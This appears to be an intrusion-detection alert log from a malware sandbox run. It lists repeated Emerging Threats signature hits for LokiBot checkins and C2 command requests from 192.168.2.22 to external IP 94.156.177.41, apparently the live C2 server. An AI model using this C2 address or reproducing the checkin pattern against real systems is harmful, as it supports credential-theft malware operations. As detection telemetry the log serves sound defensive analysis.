                                                                    2024-11-20T07:57:28.253668+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.253668+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.253668+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.977622+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.977622+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.4180TCP
                                                                    2024-11-20T07:57:28.982464+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249199TCP
                                                                    2024-11-20T07:57:29.125788+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.125788+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.125788+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.974567+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.974567+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.4180TCP
                                                                    2024-11-20T07:57:29.979437+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249200TCP
                                                                    2024-11-20T07:57:30.114920+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.114920+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.114920+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.837963+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.837963+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.4180TCP
                                                                    2024-11-20T07:57:30.843035+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249201TCP
                                                                    2024-11-20T07:57:30.992768+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:30.992768+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:30.992768+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.706612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.706612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.4180TCP
                                                                    2024-11-20T07:57:31.716016+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249202TCP
                                                                    2024-11-20T07:57:32.063042+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.063042+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.063042+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.784000+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.784000+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.4180TCP
                                                                    2024-11-20T07:57:32.789112+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249203TCP
                                                                    2024-11-20T07:57:32.925555+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:32.925555+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:32.925555+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.768266+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.768266+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.4180TCP
                                                                    2024-11-20T07:57:33.773092+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249204TCP
                                                                    2024-11-20T07:57:33.906030+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:33.906030+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:33.906030+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.637117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.637117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.4180TCP
                                                                    2024-11-20T07:57:34.643251+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249205TCP
                                                                    2024-11-20T07:57:34.787024+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:34.787024+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:34.787024+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.506502+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.506502+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.4180TCP
                                                                    2024-11-20T07:57:35.511423+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249206TCP
                                                                    2024-11-20T07:57:35.655030+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:35.655030+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:35.655030+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.385030+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.385030+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.4180TCP
                                                                    2024-11-20T07:57:36.389874+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249207TCP
                                                                    2024-11-20T07:57:36.530041+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:36.530041+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:36.530041+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.244067+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.244067+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.4180TCP
                                                                    2024-11-20T07:57:37.249204+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249208TCP
                                                                    2024-11-20T07:57:37.385969+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:37.385969+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:37.385969+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:38.096012+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:38.096012+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.4180TCP
                                                                    2024-11-20T07:57:38.100844+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249209TCP
                                                                    2024-11-20T07:57:38.245541+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.4180TCP
                                                                    2024-11-20T07:57:38.245541+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.4180TCP
                                                                    2024-11-20T07:57:38.245541+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.4180TCP
                                                                    2024-11-20T07:57:38.955955+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.4180TCP
                                                                    2024-11-20T07:57:38.955955+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.4180TCP
                                                                    2024-11-20T07:57:38.960823+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249210TCP
                                                                    2024-11-20T07:57:39.100304+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.4180TCP
                                                                    2024-11-20T07:57:39.100304+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.4180TCP
                                                                    2024-11-20T07:57:39.100304+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.4180TCP
                                                                    2024-11-20T07:57:39.954333+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.4180TCP
                                                                    2024-11-20T07:57:39.954333+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.4180TCP
                                                                    2024-11-20T07:57:39.959250+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249211TCP
                                                                    2024-11-20T07:57:40.099524+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.4180TCP
                                                                    2024-11-20T07:57:40.099524+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.4180TCP
                                                                    2024-11-20T07:57:40.099524+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.4180TCP
                                                                    2024-11-20T07:57:40.816303+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.4180TCP
                                                                    2024-11-20T07:57:40.816303+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.4180TCP
                                                                    2024-11-20T07:57:40.821148+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249212TCP
                                                                    2024-11-20T07:57:40.957522+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.4180TCP
                                                                    2024-11-20T07:57:40.957522+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.4180TCP
                                                                    2024-11-20T07:57:40.957522+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.4180TCP
                                                                    2024-11-20T07:57:41.675988+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.4180TCP
                                                                    2024-11-20T07:57:41.675988+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.4180TCP
                                                                    2024-11-20T07:57:41.680888+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249213TCP
                                                                    2024-11-20T07:57:41.834157+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.4180TCP
                                                                    2024-11-20T07:57:41.834157+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.4180TCP
                                                                    2024-11-20T07:57:41.834157+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.4180TCP
                                                                    2024-11-20T07:57:42.543644+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.4180TCP
                                                                    2024-11-20T07:57:42.543644+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.4180TCP
                                                                    2024-11-20T07:57:42.548514+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249214TCP
                                                                    2024-11-20T07:57:42.690842+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.4180TCP
                                                                    2024-11-20T07:57:42.690842+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.4180TCP
                                                                    2024-11-20T07:57:42.690842+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.4180TCP
                                                                    2024-11-20T07:57:43.545186+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.4180TCP
                                                                    2024-11-20T07:57:43.545186+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.4180TCP
                                                                    2024-11-20T07:57:43.550061+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249215TCP
                                                                    2024-11-20T07:57:43.687015+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.4180TCP
                                                                    2024-11-20T07:57:43.687015+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.4180TCP
                                                                    2024-11-20T07:57:43.687015+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.4180TCP
                                                                    2024-11-20T07:57:44.541694+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.4180TCP
                                                                    2024-11-20T07:57:44.541694+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.4180TCP
                                                                    2024-11-20T07:57:44.546679+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249216TCP
                                                                    2024-11-20T07:57:44.686743+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.4180TCP
                                                                    2024-11-20T07:57:44.686743+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.4180TCP
                                                                    2024-11-20T07:57:44.686743+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.4180TCP
                                                                    2024-11-20T07:57:45.533689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.4180TCP
                                                                    2024-11-20T07:57:45.533689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.4180TCP
                                                                    2024-11-20T07:57:45.538504+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249217TCP
                                                                    2024-11-20T07:57:45.683162+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.4180TCP
                                                                    2024-11-20T07:57:45.683162+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.4180TCP
                                                                    2024-11-20T07:57:45.683162+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.4180TCP
                                                                    2024-11-20T07:57:46.392082+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.4180TCP
                                                                    2024-11-20T07:57:46.392082+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.4180TCP
                                                                    2024-11-20T07:57:46.397054+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249218TCP
                                                                    2024-11-20T07:57:46.572052+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921994.156.177.4180TCP
                                                                    2024-11-20T07:57:46.572052+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921994.156.177.4180TCP
                                                                    2024-11-20T07:57:46.572052+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921994.156.177.4180TCP
                                                                    2024-11-20T07:57:47.435298+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921994.156.177.4180TCP
                                                                    2024-11-20T07:57:47.435298+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921994.156.177.4180TCP
                                                                    2024-11-20T07:57:47.440139+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249219TCP
                                                                    2024-11-20T07:57:47.625431+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.4180TCP
                                                                    2024-11-20T07:57:47.625431+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.4180TCP
                                                                    2024-11-20T07:57:47.625431+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.4180TCP
                                                                    2024-11-20T07:57:48.350376+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.4180TCP
                                                                    2024-11-20T07:57:48.350376+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.4180TCP
                                                                    2024-11-20T07:57:48.355331+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249220TCP
                                                                    2024-11-20T07:57:48.537909+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922194.156.177.4180TCP
                                                                    2024-11-20T07:57:48.537909+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922194.156.177.4180TCP
                                                                    2024-11-20T07:57:48.537909+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922194.156.177.4180TCP
                                                                    2024-11-20T07:57:49.387296+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922194.156.177.4180TCP
                                                                    2024-11-20T07:57:49.387296+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922194.156.177.4180TCP
                                                                    2024-11-20T07:57:49.392166+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249221TCP
                                                                    2024-11-20T07:57:49.537253+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922294.156.177.4180TCP
                                                                    2024-11-20T07:57:49.537253+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922294.156.177.4180TCP
                                                                    2024-11-20T07:57:49.537253+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922294.156.177.4180TCP
                                                                    2024-11-20T07:57:50.396869+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922294.156.177.4180TCP
                                                                    2024-11-20T07:57:50.396869+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922294.156.177.4180TCP
                                                                    2024-11-20T07:57:50.401732+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249222TCP
                                                                    2024-11-20T07:57:50.541403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922394.156.177.4180TCP
                                                                    2024-11-20T07:57:50.541403+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922394.156.177.4180TCP
                                                                    2024-11-20T07:57:50.541403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922394.156.177.4180TCP
                                                                    2024-11-20T07:57:51.400249+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922394.156.177.4180TCP
                                                                    2024-11-20T07:57:51.400249+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922394.156.177.4180TCP
                                                                    2024-11-20T07:57:51.405120+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249223TCP
                                                                    2024-11-20T07:57:51.550185+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922494.156.177.4180TCP
                                                                    2024-11-20T07:57:51.550185+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922494.156.177.4180TCP
                                                                    2024-11-20T07:57:51.550185+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922494.156.177.4180TCP
                                                                    2024-11-20T07:57:52.414699+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922494.156.177.4180TCP
                                                                    2024-11-20T07:57:52.414699+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922494.156.177.4180TCP
                                                                    2024-11-20T07:57:52.419599+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249224TCP
                                                                    2024-11-20T07:57:52.571474+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922594.156.177.4180TCP
                                                                    2024-11-20T07:57:52.571474+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922594.156.177.4180TCP
                                                                    2024-11-20T07:57:52.571474+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922594.156.177.4180TCP
                                                                    2024-11-20T07:57:53.412939+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922594.156.177.4180TCP
                                                                    2024-11-20T07:57:53.412939+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922594.156.177.4180TCP
                                                                    2024-11-20T07:57:53.417983+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249225TCP
                                                                    2024-11-20T07:57:53.565464+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922694.156.177.4180TCP
                                                                    2024-11-20T07:57:53.565464+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922694.156.177.4180TCP
                                                                    2024-11-20T07:57:53.565464+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922694.156.177.4180TCP
                                                                    2024-11-20T07:57:54.297505+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922694.156.177.4180TCP
                                                                    2024-11-20T07:57:54.297505+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922694.156.177.4180TCP
                                                                    2024-11-20T07:57:54.302370+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249226TCP
                                                                    2024-11-20T07:57:54.459148+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922794.156.177.4180TCP
                                                                    2024-11-20T07:57:54.459148+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922794.156.177.4180TCP
                                                                    2024-11-20T07:57:54.459148+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922794.156.177.4180TCP
                                                                    2024-11-20T07:57:55.163739+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922794.156.177.4180TCP
                                                                    2024-11-20T07:57:55.163739+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922794.156.177.4180TCP
                                                                    2024-11-20T07:57:55.168793+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249227TCP
                                                                    2024-11-20T07:57:55.316399+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922894.156.177.4180TCP
                                                                    2024-11-20T07:57:55.316399+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922894.156.177.4180TCP
                                                                    2024-11-20T07:57:55.316399+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922894.156.177.4180TCP
                                                                    2024-11-20T07:57:56.037599+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922894.156.177.4180TCP
                                                                    2024-11-20T07:57:56.037599+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922894.156.177.4180TCP
                                                                    2024-11-20T07:57:56.042606+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249228TCP
                                                                    2024-11-20T07:57:56.191793+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922994.156.177.4180TCP
                                                                    2024-11-20T07:57:56.191793+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922994.156.177.4180TCP
                                                                    2024-11-20T07:57:56.191793+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922994.156.177.4180TCP
                                                                    2024-11-20T07:57:56.912319+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922994.156.177.4180TCP
                                                                    2024-11-20T07:57:56.912319+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922994.156.177.4180TCP
                                                                    2024-11-20T07:57:56.917175+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249229TCP
                                                                    2024-11-20T07:57:57.056887+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923094.156.177.4180TCP
                                                                    2024-11-20T07:57:57.056887+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923094.156.177.4180TCP
                                                                    2024-11-20T07:57:57.056887+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923094.156.177.4180TCP
                                                                    2024-11-20T07:57:57.913305+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923094.156.177.4180TCP
                                                                    2024-11-20T07:57:57.913305+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923094.156.177.4180TCP
                                                                    2024-11-20T07:57:57.919026+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249230TCP
                                                                    2024-11-20T07:57:58.063832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923194.156.177.4180TCP
                                                                    2024-11-20T07:57:58.063832+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923194.156.177.4180TCP
                                                                    2024-11-20T07:57:58.063832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923194.156.177.4180TCP
                                                                    2024-11-20T07:57:58.907092+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923194.156.177.4180TCP
                                                                    2024-11-20T07:57:58.907092+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923194.156.177.4180TCP
                                                                    2024-11-20T07:57:58.925815+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249231TCP
                                                                    2024-11-20T07:57:59.315019+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923294.156.177.4180TCP
                                                                    2024-11-20T07:57:59.315019+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923294.156.177.4180TCP
                                                                    2024-11-20T07:57:59.315019+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923294.156.177.4180TCP
                                                                    2024-11-20T07:58:00.178852+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923294.156.177.4180TCP
                                                                    2024-11-20T07:58:00.178852+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923294.156.177.4180TCP
                                                                    2024-11-20T07:58:00.184000+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249232TCP
                                                                    2024-11-20T07:58:00.406324+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923394.156.177.4180TCP
                                                                    2024-11-20T07:58:00.406324+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923394.156.177.4180TCP
                                                                    2024-11-20T07:58:00.406324+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923394.156.177.4180TCP
                                                                    2024-11-20T07:58:01.249409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923394.156.177.4180TCP
                                                                    2024-11-20T07:58:01.249409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923394.156.177.4180TCP
                                                                    2024-11-20T07:58:01.254920+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249233TCP
                                                                    2024-11-20T07:58:01.402550+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923494.156.177.4180TCP
                                                                    2024-11-20T07:58:01.402550+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923494.156.177.4180TCP
                                                                    2024-11-20T07:58:01.402550+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923494.156.177.4180TCP
                                                                    2024-11-20T07:58:02.252446+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923494.156.177.4180TCP
                                                                    2024-11-20T07:58:02.252446+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923494.156.177.4180TCP
                                                                    2024-11-20T07:58:02.257306+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249234TCP
                                                                    2024-11-20T07:58:02.410939+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923594.156.177.4180TCP
                                                                    2024-11-20T07:58:02.410939+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923594.156.177.4180TCP
                                                                    2024-11-20T07:58:02.410939+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923594.156.177.4180TCP
                                                                    2024-11-20T07:58:03.143133+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923594.156.177.4180TCP
